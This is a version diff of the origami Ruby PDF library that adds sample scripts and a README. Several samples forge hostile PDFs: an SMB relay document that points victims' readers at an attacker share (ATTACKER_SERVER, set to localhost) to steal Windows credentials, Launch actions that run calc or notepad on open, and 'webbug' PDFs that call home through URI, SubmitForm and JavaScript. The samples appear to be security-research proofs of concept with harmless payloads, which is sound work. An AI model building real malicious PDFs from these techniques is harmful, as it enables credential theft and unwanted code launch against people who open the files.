origami 1.2.1 → 1.2.2

data/{origami → lib/origami}/stream.rb

@@ -92,6 +92,15 @@ module Origami
  
       super
     end
+
+    def method_missing(field, *args) #:nodoc:
+      if field.to_s[-1,1] == '='
+        self[field.to_s[0..-2].to_sym] = args.first
+      else
+        obj = self[field]; 
+        obj.is_a?(Reference) ? obj.solve : obj
+      end
+    end
     
     def self.parse(stream) #:nodoc:
       

data/{origami → lib/origami}/xreftable.rb

@@ -65,7 +65,7 @@ module Origami
     USED = "n"
     FIRSTFREE = 65535
 
-    @@regexp = /(\d{10}) (\d{5}) (n|f)(\r| )\n/
+    @@regexp = /(\d{10}) (\d{5}) (n|f)(\r\n| \r| \n)/
     
     attr_accessor :offset, :generation, :state
     
@@ -76,9 +76,7 @@ module Origami
     # _state_:: The state of the referenced Object (FREE or USED).
     #
     def initialize(offset, generation, state)
-    
       @offset, @generation, @state = offset, generation, state
-    
     end
     
     def self.parse(stream) #:nodoc:
@@ -155,9 +153,9 @@ module Origami
         size = stream[2].to_i
         
         xrefs = []
-        size.times {
+        size.times do
           xrefs << XRef.parse(stream)
-        }
+        end
         
         XRef::Subsection.new(start, xrefs)
       end
@@ -315,8 +313,6 @@ module Origami
     include Enumerable
     include StandardObject
 
-    attr_reader :xrefs
- 
     #
     # Xref fields
     #

data/samples/README.txt

@@ -0,0 +1,45 @@
+:: SUBDIRECTORIES
+=================
+
+``attachments/``
+* Adding a file attachment to a PDF document.
+
+``crypto/``
+* PDF encryption (supports RC4 40-128 bits, and AES128).
+  - crypto.rb : Create a simple encrypted document.
+  - encrypt.rb : Encrypt an existing document.
+
+``digsig/``
+* PDF digital signatures. Create a new document and signs it with test.key.
+
+``exploits/``
+* Basic exploits PoC generation.
+
+``flash/``
+* PDF with Flash object. Create a document with an embedded SWF file.
+
+``actions/launch/``
+* Launch action. Create a document launching the calculator on Windows, Unix and MacOS.
+
+``actions/loop/``
+* Create a looping document using GoTo and Named actions (see also moebius in the scripts directory). 
+
+``actions/named/``
+* Named action. Create a document prompting for printing.
+
+``actions/triggerevents/``
+* Create a document launching JS scripts on various events.
+
+``actions/webbug/``
+* Create a document connecting to a remote server.
+  - webbug-browser.rb : Connection using a URI action.
+  - webbug-reader.rb : Connection using a SubmitForm action.
+  - webbug-js.rb : Connection using JS script.
+
+``actions/samba/``
+* Implementation of a SMB relay attack using PDF. When opened in a
+  browser on Windows, the document tries to access a document shared
+  on a malicious SMB server (on a LAN). The server will then be able
+  to steal user credentials. This script merely forges the malicious
+  PDF document.
+

data/samples/actions/launch/calc.rb

@@ -0,0 +1,87 @@
+#!/usr/bin/ruby 
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+
+puts "Generating a pdf launching calc on several OS!!"
+
+pdf = PDF.new
+
+#�Reader7.0 �
+#�A popup firstly says it cannot open the specified file. Then the
+#�file is opened once the "Open" button is clicked...
+
+# Reader8.0
+#�It "opens" the file, but does not execute it. By default, it seems
+# it is passed to the default browser.
+# Only local files can be opened this way.
+#�If the file does not exist, it displays the content of the current
+# directory
+
+cmd = FileSpec.new
+cmd.Unix = "/usr/bin/xcalc"
+cmd.Mac = "/Applications/Calculator.app"
+cmd.DOS = "C:\\\\WINDOWS\\\\system32\\\\calc.exe"
+
+action = Action::Launch.new
+action.F = cmd
+
+pdf.onDocumentOpen( action )
+
+contents = ContentStream.new
+contents.write OUTPUTFILE,
+  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+
+contents.write "This page is empty but it should start calc :-D",
+  :x => 233, :y => 690, :rendering => Text::Rendering::FILL, :size => 15, :color => Graphics::Color::RGB.new(0, 150, 0)
+
+contents.write "Dont be afraid of the pop-ups, just click them...",
+  :x => 233, :y => 670, :size => 15
+
+contents.write "Comments:",
+  :x => 75, :y => 620, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
+
+content = <<-EOS
+Windows:
+  - Foxit 2: runs calc.exe at the document opening without any user confirmation message (!)      
+  - Acrobat Reader *:
+      1. popup proposing to open \"calc.exe\" (warning)
+      2.  starts  \"calc.exe\"
+
+Mac:
+  - Preview does not support PDF keyword /Launch
+  - Acrobat Reader 8.1.2: starts Calculator.app
+
+Linux:
+  ! Assumes xcalc is in /usr/bin/xcalc
+  - poppler: does not support PDF keyword /Launch
+  - Acrobat Reader 7: 
+      1. popup telling it can not open \"xcalc\" (dumb reasons)
+      2. popup proposing to open \"xcalc\" (warning)
+      3. starts  \"xcalc\"
+  - Acrobat Reader 8.1.2: based on xdg-open
+      - if you are running KDE, Gnome or xfce, xcalc is started after a popup
+      - otherwise, your brower is started and tries to download \"xcalc\"
+
+Note:
+For Linux and Mac, no argument can be given to the command...
+
+EOS
+
+contents.write content,
+  :x => 75, :y => 600, :rendering => Text::Rendering::FILL
+
+page = Page.new.setContents( contents )
+pdf.append_page( page )
+
+pdf.save(OUTPUTFILE)
+puts "PDF file saved as #{OUTPUTFILE}."
+

data/samples/actions/launch/winparams.rb

@@ -0,0 +1,22 @@
+#!/usr/bin/ruby 
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+
+params = Action::Launch::WindowsLaunchParams.new
+params.F = "C:\\\\WINDOWS\\\\system32\\\\notepad.exe" # application or document to launch
+params.D = "C:\\\\WINDOWS\\\\system32" # new current directory
+params.P = "test.txt" # parameter to pass if F is an application
+
+action = Action::Launch.new
+action.Win = params
+
+PDF.new.onDocumentOpen( action ).save(OUTPUTFILE)

data/samples/actions/loop/loopgoto.rb

@@ -0,0 +1,24 @@
+#!/usr/bin/env ruby
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+pdf = PDF.read("sample.pdf", :verbosity => Parser::VERBOSE_DEBUG )
+
+index = 1
+pages = pdf.pages
+
+pages.each do |page|
+  page.onOpen(Action::GoTo.new(Destination::GlobalFit.new pages[index % pages.size].reference))
+
+  index = index + 1
+end
+
+pdf.save("loopgoto_sample.pdf")
+

data/samples/actions/loop/loopnamed.rb

@@ -0,0 +1,21 @@
+#!/usr/bin/env ruby
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+pdf = PDF.read("sample.pdf", :verbosity => Parser::VERBOSE_DEBUG )
+
+pages = pdf.pages
+
+pages.each do |page| 
+  page.onOpen(Action::Named.new(Action::Named::NEXTPAGE)) unless page == pages.last
+end
+pages.last.onOpen(Action::Named.new(Action::Named::FIRSTPAGE))
+
+pdf.save("loopnamed_sample.pdf")

data/samples/actions/named/named.rb

@@ -0,0 +1,31 @@
+#!/usr/bin/ruby 
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+
+puts "Now generating a new PDF file from scratch!"
+
+pdf = PDF.new
+
+page = Page.new
+
+contents = ContentStream.new
+contents.write OUTPUTFILE,
+  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+
+page.Contents = contents
+pdf.append_page(page)
+
+pdf.onDocumentOpen Action::Named.new(Action::Named::PRINT)
+
+pdf.save(OUTPUTFILE)
+
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/actions/samba/smbrelay.rb

@@ -0,0 +1,26 @@
+#!/usr/bin/ruby 
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+#
+# SMB relay attack.
+# Uses a GoToR action to open a shared network directory.
+#
+
+ATTACKER_SERVER = "localhost"
+
+pdf = PDF.read(ARGV[0])
+
+dst = ExternalFile.new("\\\\#{ATTACKER_SERVER}\\origami\\owned.pdf")
+gotor = Action::GoToR.new(dst, Destination::GlobalFit.new(0), true)
+pdf.pages.first.onOpen(gotor)
+
+pdf.save("#{File.basename($0, '.rb')}.pdf")
+

data/samples/actions/triggerevents/trigger.rb

@@ -0,0 +1,75 @@
+#!/usr/bin/ruby 
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+
+puts "Now generating a new PDF file from scratch!"
+
+pdf = PDF.new
+
+page = Page.new
+
+contents = ContentStream.new
+contents.write "Pass your mouse over the yellow square",
+  :x => 250, :y => 750, :size => 15
+
+page.setContents( contents )
+
+onpageopen = Action::JavaScript.new "app.alert('Page Opened');"
+onpageclose = Action::JavaScript.new "app.alert('Page Closed');"
+ondocumentopen = Action::JavaScript.new "app.alert('Document is opened');"
+ondocumentclose = Action::JavaScript.new "app.alert('Document is closing');"
+onmouseover =Action::JavaScript.new "app.alert('Mouse over');"
+onmouseleft =Action::JavaScript.new "app.alert('Mouse left');"
+onmousedown = Action::JavaScript.new "app.alert('Mouse down');"
+onmouseup = Action::JavaScript.new "app.alert('Mouse up');"
+onparentopen = Action::JavaScript.new "app.alert('Parent page has opened');"
+onparentclose = Action::JavaScript.new "app.alert('Parent page has closed');"
+onparentvisible = Action::JavaScript.new "app.alert('Parent page is visible');"
+onparentinvisible = Action::JavaScript.new "app.alert('Parent page is no more visible');"
+namedscript = Action::JavaScript.new "app.alert('Names directory script');"
+
+pdf.onDocumentOpen(ondocumentopen)
+pdf.onDocumentClose(ondocumentclose)
+page.onOpen(onpageopen).onClose(onpageclose)
+
+pdf.register(Names::Root::JAVASCRIPT, "test", namedscript)
+
+rect_coord = Rectangle[:llx => 350, :lly => 700, :urx => 415, :ury => 640]
+
+# Just draw a yellow rectangle.
+rect = Annotation::Square.new
+rect.Rect = rect_coord
+rect.IC = [ 255, 255, 0 ]
+
+# Creates a new annotation which will catch mouse actions.
+annot = Annotation::Screen.new
+annot.Rect = rect_coord
+
+# Bind the scripts to numerous triggers.
+annot.onMouseOver(onmouseover)
+annot.onMouseOut(onmouseleft)
+annot.onMouseDown(onmousedown)
+annot.onMouseUp(onmouseup)
+annot.onPageOpen(onparentopen)
+annot.onPageClose(onparentclose)
+annot.onPageVisible(onparentvisible)
+annot.onPageInvisible(onparentinvisible)
+
+page.add_annot(annot)
+page.add_annot(rect)
+
+pdf.append_page(page)
+
+# Save the resulting file.
+pdf.save(OUTPUTFILE)
+
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/actions/webbug/submitform.js

@@ -0,0 +1,26 @@
+try
+{
+
+  app.alert("First, I try to launch your browser :)");
+  app.launchURL("http://localhost/webbug-browser.html");
+  
+}
+catch(e)
+{
+}
+
+try
+{
+  app.alert("Now I try to connect to the website, through your Reader");
+
+  this.submitForm( 
+  { 
+    cURL: "http://localhost/webbug-reader.php",
+    bAnnotations: true,
+    bGet: true,
+    cSubmitAs: "XML"
+  });
+}
+catch(e)
+{
+}

data/samples/actions/webbug/webbug-browser.rb

@@ -0,0 +1,68 @@
+#!/usr/bin/ruby 
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+OUTPUTFILE = "webbug-browser.pdf"
+
+puts "Now generating a new bugged PDF file from scratch!"
+
+URL = "http://localhost/webbug-browser.html"
+
+pdf = PDF.new
+
+contents = ContentStream.new
+contents.write "webbug-browser.pdf",
+  :x => 270, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
+
+contents.write "When opened, this PDF connects to \"home\"",
+  :x => 156, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
+
+contents.write "Click \"Allow\":",
+  :x => 156, :y => 670, :size => 12
+
+contents.write "  1. Starts your default browser",
+  :x => 156, :y => 650, :size => 12 
+
+contents.write "  1. Connects to #{URL}",
+  :x => 156, :y => 630, :size => 12
+
+contents.write "Comments:",
+  :x => 75, :y => 580, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
+
+content = <<-EOS
+Windows:
+  - Foxit : opens the default browser without any user confirmation (!)
+  - Acrobat Reader 8: a pop-up spreads asking if it can connect, then Internet Explorer is connected.
+
+
+Mac:
+  - Preview: nothing happens
+  - Acrobat Reader 8: a pop-up spreads asking if it can connect, then Safari is connected
+
+Linux:
+  - poppler: nothing happens
+  - Acrobat Reader [7, 8]: a pop-up spreads asking if it can connect
+
+
+EOS
+
+contents.write content,
+  :x => 75, :y => 560, :rendering => Text::Rendering::FILL
+
+
+page = Page.new.setContents( contents )
+pdf.append_page(page)
+
+# Starting action
+pdf.onDocumentOpen Action::URI.new(URL)
+
+pdf.save(OUTPUTFILE)
+
+puts "PDF file saved as #{OUTPUTFILE}."